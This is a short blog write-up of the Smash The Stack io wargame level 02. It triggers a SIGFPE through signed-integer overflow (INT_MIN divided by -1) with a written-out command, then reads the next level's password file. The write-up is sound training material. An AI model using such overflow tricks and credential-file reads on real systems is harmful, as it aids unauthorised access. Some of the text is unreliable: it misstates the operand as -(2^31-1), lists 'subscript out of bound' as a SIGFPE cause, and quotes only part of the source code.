Smash The Stack – Exploit i/o – Level 02

Logging in with the password from Level 01

~$ cd /levels

you will find 2 problems that you might solve either of them


open the sourcefile

/levels$ cat level02.c

you will find the following code

void catcher(int a){
int main(int argc, char **argv){
        puts("source code is available in level02.c\n");
        if (argc != 3 || !atoi(argv[2]))
                return 1;
        signal(SIGFPE, catcher);
        return atoi(argv[1]) / atoi(argv[2]);

the program catches a SIGFPE which is an arithmetic error like division by zero or subscript out of bound

you can’t divide by zero as the code checks for argv[2] for a non-zero value

but by a little math you can know that you can generate the same error by dividing -(2^31 -1) over -1

then the rest is easy

/levels$ ./level02 -2147483648 -1

then grab the password

/levels$ cat /home/level3/.pass

it took me a time of searching to know what cases exactly causes the SIGFPE.


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: